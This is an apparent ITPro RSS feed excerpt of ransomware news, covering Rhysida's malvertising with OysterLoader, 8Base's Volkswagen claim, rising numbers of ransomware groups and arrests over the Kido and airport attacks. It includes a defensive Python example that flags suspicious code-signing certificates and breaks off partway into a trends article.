                                <p>Search engine users should be cautious about downloading <a href="https://www.itpro.com/software/33703/microsoft-teams-review-a-no-brainer-for-microsoft-shops">Microsoft Teams</a>, with the Rhysida <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware</a> group using fake ads to distribute malware.</p><p><a href="https://www.itpro.com/security/28133/what-is-cyber-security">Cybersecurity</a> firm Expel said it <a href="https://expel.com/blog/certified-oysterloader-tracking-rhysida-ransomware-gang-activity-via-code-signing-certificates/"><u>has discovered</u></a> an ongoing malicious ad campaign delivering malware called OysterLoader, previously known as Broomstick and CleanUpLoader.</p><p>It's the group's second campaign to impersonate the workplace collaboration platform in the last eighteen months.</p><p>OysterLoader is an initial access tool (IAT) that, once downloaded, runs a backdoor to gain long-term access to the device and network.</p><p>"The current infection chain is built on a highly successful <a href="https://www.itpro.com/security/what-is-to-be-done-about-googles-malvertising-problem">malvertising</a> model. Threat actors buy Bing search engine advertisements to direct users to convincing-looking, but malicious landing pages," said Aaron Walton, threat intelligence analyst at Expel.</p><p>"These search engine ads put links to the download right in front of potential victims. The most recent campaigns push ads for Microsoft Teams and impersonate the download pages. However, they’ve also cycled through other popular software such as PuTTY and <a href="https://www.itpro.com/software/355486/zoom-review-are-we-alone-now">Zoom</a>."</p><p>The group uses a packing tool that hides the capabilities of the malware and results in a low static detection rate when a sample is first seen.</p><p>It also uses code-signing certificates, as genuine software publishers do, to give its malicious files a higher level of trust.</p><p>Notably, Walton said this helped Expel detect the campaign.</p><p>"The certificates they use regularly get revoked by the certificate’s issuer, so new instances of the malware with a valid certificate indicate a new run of the campaign," he said.</p><p>"On any given day the bad actors may use multiple certificates, but seeing their files with a new fresh certificate also helps us know they’re still active. These new certificates further indicate steady investment into their campaign."</p><h2 id="rhysida-is-ramping-up-attacks">Rhysida is ramping up attacks</h2><p>Along with the OysterLoader malware, Rhysida is also using the Latrodectus malware to gain initial access to networks, Expel warned; it established this while analyzing files in order to build detection rules.</p><p>Rhysida is one of the few cyber criminal groups leveraging Trusted Signing from Microsoft, the company’s own service for issuing code-signing certificates.</p><p>Attackers are using Trusted Signing certificates for both OysterLoader and Latrodectus and appear to have found a way round the built-in features designed to limit misuse.</p><p>Rhysida first appeared as <a href="https://www.itpro.com/security/ransomware/368266/vice-society-ransomware-palermo-details-recovery-strategy">Vice Society</a> in 2021, but rebranded as Rhysida in 2023, and operates on a <a href="https://www.itpro.com/security/29332/the-rise-of-ransomware-as-a-service">Ransomware as a Service (RaaS)</a>, <a href="https://www.itpro.com/security/ransomware/367624/the-rise-of-double-extortion-ransomware">double extortion model</a>. Since 2023, the group has posted around 200 victims on its data leak site, including governments, healthcare organisations, and critical infrastructure industries.</p><p>Earlier this year, the group claimed responsibility for attacks on the Oregon Department of Environmental Quality, the Cookeville Regional Medical Center in Tennessee, Kansas-based healthcare provider Sunflower Medical Group, and mental illness and addiction group the Community Care Alliance.</p><p>Elsewhere, the group also hit the Maryland Department of Transportation alongside an <a href="https://www.itpro.com/security/british-library-says-reliance-on-complex-legacy-infrastructure-hampered-cyber-attack-recovery">attack on the British Library</a>. 
</p><h3 class="article-body__section" id="section-more-from-itpro"><span>MORE FROM ITPRO</span></h3><ul><li><a href="https://www.itpro.com/security/cyber-attacks/how-hackers-bypass-mfa-and-what-to-do-about-it">How hackers bypass MFA – and what to do about it</a></li><li><a href="https://www.itpro.com/security/malware/hackers-are-disguising-malware-as-chatgpt-microsoft-office-and-google-drive-to-dupe-workers">Hackers are disguising malware as ChatGPT, Microsoft Office, and Google Drive to dupe workers</a></li><li><a href="https://www.itpro.com/business/business-strategy/ransomware-victims-are-refusing-to-play-ball-with-hackers-just-17-percent-of-enterprises-have-paid-up-so-far-in-2025-marking-an-all-time-low">Ransomware victims are refusing to play ball with hackers</a></li></ul>
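<p>The detection idea Walton describes, tracking the campaign through its certificates, can be turned into triage logic over signature metadata. The Python below is an added example written for this page, not Expel’s tooling, and runs over constructed records rather than real samples. Three things in it are assumptions rather than facts from the article: the legitimate publisher names in EXPECTED_SIGNER, the "Microsoft ID Verified" issuer-CN prefix used to recognise a Trusted Signing certificate, and the three-day ceiling for "short-lived".</p>

```python
"""Triage of Authenticode metadata for the malvertising pattern above:
impersonated installers signed with short-lived certificates that the issuer
later revokes, where each fresh, still-valid certificate marks a new run.

Added example for this article, not Expel's tooling. SAMPLE is constructed.
Assumptions not taken from the article: EXPECTED_SIGNER values, the
TRUSTED_SIGNING_ISSUER_PREFIX, and the SHORT_LIVED ceiling.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta

# Installer filename keyword -> publisher CN a genuine build should carry (assumed).
EXPECTED_SIGNER = {
    "teams": "Microsoft Corporation",
    "putty": "Simon Tatham",
    "zoom": "Zoom Video Communications, Inc.",
}
TRUSTED_SIGNING_ISSUER_PREFIX = "Microsoft ID Verified"  # assumed issuer CN prefix
SHORT_LIVED = timedelta(days=3)                          # assumed validity ceiling


@dataclass
class SignedFile:
    """Signature metadata as a sandbox or EDR might record it for one binary."""
    file_name: str
    sha256: str
    cert_thumbprint: str
    signer_cn: str
    issuer_cn: str
    not_before: datetime
    not_after: datetime
    first_seen: datetime
    revoked: bool = False

    def valid_when_seen(self) -> bool:
        return not self.revoked and self.not_before <= self.first_seen <= self.not_after


@dataclass
class CampaignState:
    """Signers already tied to the campaign, and certificate thumbprints already seen."""
    bad_signers: set = field(default_factory=set)
    seen_thumbprints: set = field(default_factory=set)


def triage(rec: SignedFile, state: CampaignState) -> list:
    """Return findings for one record and update the campaign state."""
    findings = []
    known_signer = rec.signer_cn in state.bad_signers  # evaluated before this record is learned
    name = rec.file_name.lower()

    # 1. Brand impersonation: the filename claims a product the signer does not own.
    for keyword, publisher in EXPECTED_SIGNER.items():
        if keyword in name and rec.signer_cn != publisher:
            findings.append(f"impersonation: {rec.file_name} signed by '{rec.signer_cn}', expected '{publisher}'")
            state.bad_signers.add(rec.signer_cn)

    # 2. Short-lived certificate from a Trusted Signing-style issuer.
    if rec.issuer_cn.startswith(TRUSTED_SIGNING_ISSUER_PREFIX) and (rec.not_after - rec.not_before) <= SHORT_LIVED:
        findings.append("short-lived Trusted Signing certificate")

    # 3. Revocation is a lagging indicator: the file was trusted until the issuer acted.
    if rec.revoked:
        findings.append("certificate revoked by issuer")

    # 4. A known campaign signer reappearing with a new, still-valid certificate
    #    is the "new run of the campaign" signal quoted above.
    if known_signer and rec.cert_thumbprint not in state.seen_thumbprints and rec.valid_when_seen():
        findings.append("new valid certificate for known campaign signer: new campaign run")

    state.seen_thumbprints.add(rec.cert_thumbprint)
    return findings


T0 = datetime(2025, 10, 1)

# Constructed records: two Teams lures from one shell signer, then two genuine builds.
SAMPLE = [
    SignedFile("MSTeamsSetup.exe", "a1" * 32, "T1", "Example Shell Co LLC",
               "Microsoft ID Verified CS EOC CA 01", T0, T0 + timedelta(days=3),
               T0 + timedelta(hours=6), revoked=True),
    SignedFile("MSTeamsSetup_x64.exe", "b2" * 32, "T2", "Example Shell Co LLC",
               "Microsoft ID Verified CS EOC CA 01", T0 + timedelta(days=12), T0 + timedelta(days=15),
               T0 + timedelta(days=12, hours=2)),
    SignedFile("MSTeamsSetup.exe", "c3" * 32, "T3", "Microsoft Corporation",
               "Microsoft Code Signing PCA 2011", datetime(2025, 1, 1), datetime(2026, 1, 1), T0),
    SignedFile("putty-64bit-installer.msi", "d4" * 32, "T4", "Simon Tatham",
               "Example Public CA", datetime(2025, 1, 1), datetime(2026, 1, 1), T0),
]


def run_demo() -> list:
    """Triage SAMPLE in arrival order with one shared campaign state."""
    state = CampaignState()
    return [triage(rec, state) for rec in SAMPLE]


if __name__ == "__main__":
    for rec, findings in zip(SAMPLE, run_demo()):
        print(rec.file_name, rec.cert_thumbprint, findings or ["clean"])
```

<p>Order matters here: the first lure establishes the shell signer as campaign infrastructure, so when the same signer turns up again under a fresh, unrevoked certificate the second record is flagged as a new run even though its hash has never been seen. Revocation on its own would have caught only the first sample, and only after the issuer acted.</p>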
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Volkswagen confirms security ‘incident’ amid ransomware breach claims ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/volkswagen-cyber-attack-8base-ransomware-claims</link>
                                                                            <description>
                            <![CDATA[ Volkswagen has confirmed a security "incident" has occurred, but insists no IT systems have been compromised. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">XRX7HPdNZK5eDAWQdecV9V</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/CozKDyii8Kdz9mfKxVUFbe-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 21 Oct 2025 11:27:22 +0000</pubDate>                                                                                                                                <updated>Tue, 21 Oct 2025 11:58:54 +0000</updated>
                                                                                                                                            <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/CozKDyii8Kdz9mfKxVUFbe-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Volkswagen vehicles lined up in a parking lot with company logo and branding pictured on side of an assembly plant in background.]]></media:description>                                                            <media:text><![CDATA[Volkswagen vehicles lined up in a parking lot with company logo and branding pictured on side of an assembly plant in background.]]></media:text>
                                <media:title type="plain"><![CDATA[Volkswagen vehicles lined up in a parking lot with company logo and branding pictured on side of an assembly plant in background.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/CozKDyii8Kdz9mfKxVUFbe-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p><a href="https://www.itpro.com/security/28084/what-is-ransomware">Ransomware</a> group 8Base has claimed responsibility for an attack on Volkswagen Group in which it says it stole sensitive data.</p><p>The data allegedly taken includes invoices, receipts, accounting documents, personal employee files, employment contracts, certificates, personnel records, and numerous confidentiality agreements.</p><p>According to 8Base, the attack took place in September 2024, meaning the group has been sitting on the data for more than a year.</p><p>Volkswagen has confirmed that a security “incident” occurred, but has so far been tight-lipped on its scope and on whether data has been stolen.</p><p>In a statement given to <a href="https://cybersecuritynews.com/volkswagen-ransomware-attack/" target="_blank"><u><em>Cybersecurity News</em></u></a>, the car manufacturer said there has been no impact on its IT systems, possibly indicating that the compromise occurred through a third-party supplier or subsidiary.</p><h2 id="who-s-behind-the-volkswagen-attack">Who’s behind the Volkswagen attack?</h2><p>8Base is a relative newcomer to the threat landscape, having burst onto the scene in 2023. The group is believed to be an offshoot of the Phobos ransomware group, and has reportedly targeted more than 1,000 organizations since forming, netting a total of $16 million in ransom payments.</p><p>Often gaining initial access via phishing campaigns or by buying credentials on the dark web, the group relies mainly on a strategy of <a href="https://www.itpro.com/security/ransomware/367624/the-rise-of-double-extortion-ransomware">double extortion</a>, encrypting victims' data and threatening to publish stolen information unless a ransom is paid. 
</p><p>Earlier this year, four Russian nationals were <a href="https://www.itpro.com/security/ransomware/8base-ransomware-gang-arrests"><u>arrested</u></a> in Thailand for alleged involvement in the group, following a joint police operation by 14 countries. The law enforcement sting saw 27 servers linked to the group seized and taken offline. </p><p>If confirmed, the Volkswagen attack may represent a change in strategy for the group. <a href="https://www.itpro.com/security/hackers-are-using-ai-to-dissect-threat-intelligence-reports-and-vibe-code-malware">Threat intelligence</a> from Europol shows 8Base has tended to focus mainly on small to medium-sized businesses, which often lack the <a href="https://www.itpro.com/security/28133/what-is-cyber-security">cybersecurity </a>defences to protect themselves. </p><p>Previous victims are believed to include a children’s hospital, health care providers, and educational institutions.</p><h3 class="article-body__section" id="section-more-from-itpro"><span>MORE FROM ITPRO</span></h3><ul><li><a href="https://www.itpro.com/business/business-strategy/ransomware-victims-are-refusing-to-play-ball-with-hackers-just-17-percent-of-enterprises-have-paid-up-so-far-in-2025-marking-an-all-time-low">Ransomware victims are refusing to play ball with hackers</a></li><li><a href="https://www.itpro.com/security/rocketing-number-of-ransomware-groups-as-new-smaller-players-emerge">The number of ransomware groups rockets as new players emerge</a></li><li><a href="https://www.itpro.com/security/ransomware/the-top-ransomware-trends-for-businesses">The top ransomware trends for businesses in 2025</a></li></ul>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ The number of ransomware groups rockets as new, smaller players emerge ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/rocketing-number-of-ransomware-groups-as-new-smaller-players-emerge</link>
                                                                            <description>
                            <![CDATA[ The good news is that the number of victims remains steady ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">H4qEvfnxsmEgU7PeYnDgEQ</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/iYfDDDfVYNFEDBMdcZc62A-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 10 Oct 2025 09:50:58 +0000</pubDate>                                                                                                                                <updated>Fri, 10 Oct 2025 14:28:05 +0000</updated>
                                                                                                                                            <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/iYfDDDfVYNFEDBMdcZc62A-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[A glowing blue padlock with coiled red CGI data around it, representing new ransomware.]]></media:description>                                                            <media:text><![CDATA[A glowing blue padlock with coiled red CGI data around it, representing new ransomware.]]></media:text>
                                <media:title type="plain"><![CDATA[A glowing blue padlock with coiled red CGI data around it, representing new ransomware.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/iYfDDDfVYNFEDBMdcZc62A-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The number of active <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware</a> groups has reached a record high, with new, smaller groups sliding under the radar.</p><p>In its latest quarterly <a href="https://www.guidepointsecurity.com/resources/grit-q3-2025-ransomware-and-cyber-threat-report/?utm_source=press%20release&utm_medium=website&utm_campaign=2025_10_09_corp_grit_q3_ransomware_report&utm_vendor=gps">Ransomware & Cyber Threat Report</a>, GuidePoint's research and intelligence team said it had seen a 57% increase in the number of ransomware groups, rising from 49 in the third quarter of 2024 to an all-time high of 77 now.</p><p>The number of victims, though, has remained relatively steady, stabilizing at around 1,500-1,600 per quarter since the last quarter of last year.</p><p>More than half of victims this quarter – 56% – were based in the US. No other country came anywhere close, with Germany second at 5% and the UK third at 4%.</p><p>The most-hit industries were manufacturing, technology, and the legal sector, with 252 publicly claimed manufacturing attacks during the quarter, up 26% quarter-over-quarter.</p><p>"Ransomware activity has settled into a new normal, averaging 1,500 to 1,600 victims per quarter since late 2024," said Nick Hyatt, senior threat intelligence analyst at GuidePoint Security.</p><p>"Yet while overall activity has stabilized, the number of distinct ransomware groups has surged to a record 77 – highlighting both the consolidation of skilled operators within major <a href="https://www.itpro.com/security/29332/the-rise-of-ransomware-as-a-service">RaaS</a> (ransomware as a service) platforms and the ongoing churn of emerging or lower-skill actors entering the ecosystem."</p><p>The Qilin ransomware group was particularly busy. Its activity surged 318% year-over-year, claiming 234 victims this quarter; Akira was next, with 130 victims, the team said.</p><p>IncRansom, which first emerged in August 2023, showed a sudden surge in activity during the third quarter, making it the third most active group. The team said it's not clear whether IncRansom will keep this level of activity up.</p><p>SafePay, meanwhile, is an insular ransomware group that first appeared in late 2024 but now claims a total of 258 victims across 29 distinct industries and 30 countries for the year to date.</p><p>And while the research counted claimed victims of established groups, the team said it had also seen, anecdotally, an increase in attacks that couldn't be attributed to any known group, or in which the threat actors outright refused to identify themselves.</p><p>"This can plausibly be the result of growing distrust in the RaaS construct, reduced barriers to entry for aspiring cybercriminals, or splintering of existing groups resulting in outcast affiliates forced to find a new home," they said.</p><p>"In the months and quarters ahead, we will specifically be looking to determine the timelines, efficacy, and victim outputs of such groups to aid in our ongoing analysis and determinations."</p><p>And, said Hyatt, the growing diversity of ransomware groups is creating new challenges for defenders.</p><p>"While established actors like Qilin and Akira are streamlining their operations, newer groups such as SafePay demonstrate how even small, insular actors can thrive by staying under the radar," he said.</p><p>"This '<a href="https://www.itpro.com/security/repeated-cyber-attacks-stark-reminder-cybersecurity-awareness-month">new normal</a>' isn't a reason for complacency – it underscores the need for sustained vigilance in an increasingly fragmented threat landscape."</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Teens arrested over nursery chain Kido hack ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/teens-arrested-over-nursery-chain-kido-hack</link>
                                                                            <description>
                            <![CDATA[ The ransom attack caused widespread shock when the hackers published children's personal data ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">NZySYFBmCJT4WCQP2XpEUN</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/mDacFVas65bAq7oWUcrkNg-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 08 Oct 2025 10:02:14 +0000</pubDate>                                                                                                                                <updated>Wed, 08 Oct 2025 10:55:46 +0000</updated>
                                                                                                                                            <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/mDacFVas65bAq7oWUcrkNg-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[A child in a nursery ]]></media:description>                                                            <media:text><![CDATA[A child in a nursery ]]></media:text>
                                <media:title type="plain"><![CDATA[A child in a nursery ]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/mDacFVas65bAq7oWUcrkNg-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The UK's Metropolitan Police have arrested two teenagers over the recent data breach at the <a href="https://www.itpro.com/security/kido-nursery-hackers-threaten-to-release-more-details-along-with-the-personal-data-of-100-employees">Kido</a> chain of children's nurseries.</p><p>The two suspects, both aged 17, were arrested yesterday in Bishop's Stortford, Hertfordshire, as part of a raid on a number of properties. They were taken into custody, where they are being questioned on suspicion of <a href="https://www.itpro.com/it-legislation/28174/what-is-the-computer-misuse-act">computer misuse</a> and blackmail.</p><p>"Since these attacks took place, specialist Met investigators have been working at pace to identify those responsible," said Will Lyne, the Met's head of economic and cybercrime.</p><p>"These arrests are a significant step forward in our investigation, but our work continues, alongside our partners, to ensure those responsible are brought to justice."</p><p>The attack on the Kido pre-school chain saw the theft of data on around 8,000 children. It appears to have been carried out through a breach of Kido's billing, staffing, and reporting software, supplied by Famly.</p><p>It was widely condemned when the previously unknown hackers, who called themselves Radiant, published the profiles of 10 children and threatened to publish more if their ransom demands weren't met.</p><p>The data included the children's names, dates of birth, and birthplaces, along with the personal details of parents, grandparents, and guardians, including their addresses and phone numbers.</p><p>The hackers were even reported to have contacted the parents of some affected children directly to extort them.</p><p>However, the attackers later removed all the stolen data and pictures from their darknet site and said they'd deleted all the data they'd stolen. 
</p><p>"We understand reports of this nature can cause considerable concern, especially to those parents and carers who may be worried about the impact of such an incident on them and their families," said Lyne.</p><p>"We want to reassure the community and anyone affected that this matter continues to be taken extremely seriously."</p><p>At the time, Palo Alto researchers noted that Radiant appeared to be a brand new group, and unaffiliated with any nation-state actors or other established cybercrime syndicates. </p><p>Targeting small children and publishing such a broad range of personal data was also something of a first. And when asked by BBC News whether they felt bad about extorting a nursery using the children's data, the criminals said they 'weren't asking for an enormous amount' and that they 'deserve some compensation for our pentest'.</p><p>While this was the first attack of its kind, Palo Alto Networks warns that there may be more, with many educational establishments using similar billing, staffing, and reporting software without understanding the security implications.</p><p>Palo Alto advises schools and nurseries that use such platforms to immediately review the security controls they currently have in use. They should rotate passwords, particularly across key operational and administrative accounts, and adopt <a href="https://www.itpro.com/security/29982/what-is-two-factor-authentication">multi-factor authentication</a> where available.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ NCA confirms arrest after airport cyber disruption ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/cyber-attacks/nca-confirms-arrest-after-airport-cyber-disruption</link>
                                                                            <description>
                            <![CDATA[ Disruption is easing across Europe following the ransomware incident ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">kWCwnrAH3rkHjFhYnwfMDX</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/rcgqGm2k9qbr9K4kHhEmvU-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 25 Sep 2025 09:25:43 +0000</pubDate>                                                                                                                                <updated>Thu, 25 Sep 2025 09:26:16 +0000</updated>
                                                                                                                                            <category><![CDATA[Cyber Attacks]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/rcgqGm2k9qbr9K4kHhEmvU-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[An abstract image showing a skull over a pixelated background to symbolise a cyber security vulnerability]]></media:description>                                                            <media:text><![CDATA[An abstract image showing a skull over a pixelated background to symbolise a cyber security vulnerability]]></media:text>
                                <media:title type="plain"><![CDATA[An abstract image showing a skull over a pixelated background to symbolise a cyber security vulnerability]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/rcgqGm2k9qbr9K4kHhEmvU-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The UK’s National Crime Agency (NCA) has made an arrest over last week's cyber attack on several airports.</p><p>The agency said a man in his forties was arrested in West Sussex on suspicion of Computer Misuse Act offences, and released on conditional bail.</p><p>“Although this arrest is a positive step, the investigation into this incident is in its early stages and remains ongoing,” said Paul Foster, NCA deputy director and head of the NCA’s National Cyber Crime Unit.</p><p>The <a href="https://www.itpro.com/security/cyber-attacks/a-cyber-attack-has-caused-chaos-at-airports-across-europe-heres-everything-we-know-so-far">cyber attack on software supplier Collins Aerospace</a> led to major disruption for airlines flying out of London Heathrow, Brussels, and Berlin, with carriers forced to check passengers in manually.</p><p>The attack targeted Collins' ARINC cMUSE software, which allows airlines to share check-in desks and boarding gate positions rather than using their own dedicated infrastructure.</p><p>It's been confirmed that the incident was a <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware </a>attack, but so far little more is known. However, <a href="https://www.itpro.com/security/28133/what-is-cyber-security">cybersecurity </a>expert Kevin Beaumont said he had identified the ransomware used.</p><p>"The Europe airlines ransomware situation is a variant of <em>Hardbit </em>ransomware, which doesn’t have a portal and is incredibly basic," he <a href="https://cyberplace.social/@GossiTheDog/115254672566587831" target="_blank"><u>wrote</u></a> on Mastodon.</p><p>"They’ve had to restart recovery again as the devices keep getting reinfected. I’ve never seen an incident like it. 
Somebody like the NCSC needs to go in and help them with IR."</p><p>There's been a lot of speculation that the attack could have been carried out by a nation-state-affiliated group, with Russia having been tipped as the most likely suspect. That may now be in doubt, said Ryan McConechy, CTO at Barrier Networks.</p><p>"While details are still emerging, the NCA has confirmed that the suspect was arrested in the UK, which will likely come as a surprise to many," he said. </p><p>"While more information is likely to surface soon, the incident once again highlights that no organization is immune to cyber crime today. Whether attackers hit an organisation directly, or impact a large pool of organizations through a supply chain, cyber crime affects all businesses."</p><p>RTX, the parent company of Collins Aerospace, has confirmed in a <a href="https://www.sec.gov/Archives/edgar/data/101829/000010182925000036/rtx-20250919.htm?7194ef805fa2d04b0f7e8c9521f97343"><u>filing</u></a> with the US Securities and Exchange Commission (SEC) that the incident was a ransomware attack.</p><p>"The Company is diligently investigating the incident with the assistance of internal and external cybersecurity experts and has notified domestic and international law enforcement authorities and certain other government agencies," it said.</p><p>"The Company is also communicating with its customers and other stakeholders and providing technical support and guidance to affected airlines and airports."</p><p>RTX said it is investigating the incident with the help of internal and external cybersecurity experts, and that it's notified domestic and international law enforcement authorities and other government agencies. </p><p>Most flights are now operating normally, although some check-in desks are still processing passengers manually.</p><p>“Cyber crime is a persistent global threat that continues to cause significant disruption to the UK," said Foster. 
"Alongside our partners here and overseas, the NCA is committed to reducing that threat in order to protect the British public.”</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ The top ransomware trends for businesses in 2025 ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/the-top-ransomware-trends-for-businesses</link>
                                                                            <description>
                            <![CDATA[ A splintering of top groups and changing attitudes toward payments are changing attacker tactics at speed ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">2qVHE7oah2J55wxJZhXQ4n</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/e6zeYCopy4dSbbjb6kpzhi-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 18 Sep 2025 16:34:12 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Kate O&#039;Flaherty ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/LUULv6n7VJ3BHPnaoLHHdg.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/e6zeYCopy4dSbbjb6kpzhi-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Gold lock floating above a digitally rendered motherboard with blue and red glowing hues, denoting ransomware]]></media:description>                                                            <media:text><![CDATA[Gold lock floating above a digitally rendered motherboard with blue and red glowing hues, denoting ransomware]]></media:text>
                                <media:title type="plain"><![CDATA[Gold lock floating above a digitally rendered motherboard with blue and red glowing hues, denoting ransomware]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/e6zeYCopy4dSbbjb6kpzhi-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The ransomware landscape is changing rapidly as new arrests are made and <a href="https://www.itpro.com/security/ransomware/its-been-a-bad-week-for-ransomware-operators"><u>prolific groups</u></a> are taken down. Some things remain the same, such as the constant stream of ransomware attacks. </p><p>But several new trends are emerging, such as the fragmentation of the ransomware ecosystem, as well as major groups like the <a href="https://www.itpro.com/security/cyber-attacks/dragonforce-growing-prominence-retailer-attacks-reputation"><u>DragonForce</u></a> ransomware-as-a-service (RaaS) operation making headlines following retail breaches against <a href="https://www.itpro.com/security/cyber-attacks/m-and-s-customer-personal-data-stolen"><u>M&S</u></a> and the <a href="https://www.itpro.com/security/co-op-cyber-attack"><u>Co-op</u></a>. </p><p>Following on from <em>ITPro’s</em> look at the top <a href="https://www.itpro.com/security/ransomware/new-ransomware-groups-worrying-security-researchers"><u>new ransomware groups to look out for,</u></a> here are the biggest ransomware trends in 2025 so far.</p><h2 id="persistence-of-raas-and-changes-in-the-ecosystem">Persistence of RaaS and changes in the ecosystem</h2><p>It’s been around for a while, but the <a href="https://www.itpro.com/security/ransomware/the-ransomware-boom-shows-no-signs-of-letting-up-and-these-groups-are-causing-the-most-chaos"><u>ransomware as a service (RaaS)</u></a> model remains a dominant force in the cyber threat landscape, according to experts. 
Despite large law enforcement operations targeting groups including <a href="https://www.itpro.com/security/cyber-crime/lockbit-data-dump-reveals-a-treasure-trove-of-intel-on-the-notorious-hacker-group"><u>LockBit</u></a> and <a href="https://www.itpro.com/security/ransomware/everything-we-know-so-far-about-the-rumored-alphv-takedown"><u>BlackCat</u></a>, RaaS has not disappeared, says David Dunn, EMEA head of the cybersecurity practice at FTI Consulting. </p><p>Dunn tells <em>ITPro</em> the crackdown on major RaaS operations has resulted in a “notable splintering” of the ransomware ecosystem. “The era where two or three RaaS operators controlled the majority of incidents appears to be over – at least for now. The distinction between initial access brokers, affiliates and core operators has become increasingly blurred.”</p><p>This has led to a more fragmented, but “still very active” threat environment, he says.</p><p>With the decline of major RaaS groups, numerous smaller operations such as <a href="https://www.itpro.com/security/cyber-attacks/lush-cyber-attack-claimed-by-akira-ransomware-gang"><u>Akira</u></a>, DragonForce, and <a href="https://www.itpro.com/security/cyber-attacks/thousands-of-procedures-canceled-at-london-hospitals-as-qilin-releases-blood-test-data"><u>Qilin</u></a> have stepped in to fill the void, says Dunn. “Their tactics tend to be more aggressive and less constrained by the traditional norms that previously deterred attacks on certain sectors such as healthcare.”</p><h2 